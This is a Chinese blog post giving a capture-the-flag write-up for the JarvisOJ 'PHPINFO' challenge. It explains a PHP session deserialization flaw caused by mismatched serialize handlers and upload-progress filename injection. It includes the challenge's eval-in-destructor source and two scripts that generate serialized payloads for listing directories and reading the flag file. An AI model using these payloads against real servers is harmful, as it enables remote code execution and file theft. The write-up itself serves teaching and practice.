JarvisOJ的PHPINFO

参考:1 2

虽说以上两篇是参考文章,然鹅session部分问题很大(第一篇中的session部分的解释被到处抄),之后细说。我不说了,下面这篇文章写的挺详细了

带你走进PHP session反序列化漏洞 这篇靠谱

 <?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }

    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}

先去phpinfo的session部分看看,部分内容如下

Session Support enabled
Registered save handlers files user
Registered serializer handlers php_serialize php php_binary wddx
Directive Local Value Master Value
session.auto_start Off Off
session.cookie_path / /
session.name PHPSESSID PHPSESSID
session.save_path /opt/lampp/temp/ /opt/lampp/temp/
session.serialize_handler php php_serialize
session.upload_progress.cleanup Off Off
session.upload_progress.enabled On On
session.upload_progress.name PHP_SESSION_UPLOAD_PROGRESS PHP_SESSION_UPLOAD_PROGRESS
session.upload_progress.prefix upload_progress_ upload_progress_

master is either the value compiled into PHP, or set via a main php.ini directive. I.e., the value that's in effect when PHP fires up, before it executes any of your code.

local is the value that's currently in effect at the moment you call phpinfo(). This local value is the end result of any overrides that have taken place via ini_set() calls, php_value directives in httpd.conf/.htaccess, etc.

就是说,默认session.serialize_handler为php_serialize,但题目中该项被覆盖为php

简单说,php 这个session.serialize_handler 将 | 后的字符串反序列化,导致产生恶意对象。

upload过程中会产生session,存在一个键值对的值为filename(可控),如果filename被我们修改为|序列化对象字符串(特殊字符记得转义),filename |后的内容就会被认为是序列化的内容,进而反序列化产生恶意对象(实际上PHP中session是写到文件中的,我们暂且忽略这一中间步骤对此处并无影响),在对象自毁时去执行__destruct()内的语句

想要使用system等函数执行shell指令,发现被禁用了一堆(phpinfo里可以看到disable_functions,就用PHP的函数来进行目录扫描和文件读取

<?php
class OowoO{
    public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
echo serialize($obj);
// |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

<?php
class OowoO{
    public $mdzz='highlight_file("Here_1s_7he_fl4g_buT_You_Cannot_see.php");';
}
$obj = new OowoO();
echo serialize($obj);
// |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:58:\"highlight_file(\"Here_1s_7he_fl4g_buT_You_Cannot_see.php\");\";}
posted @ 2022-03-18 10:48  NwN  阅读(89)  评论(0)    收藏  举报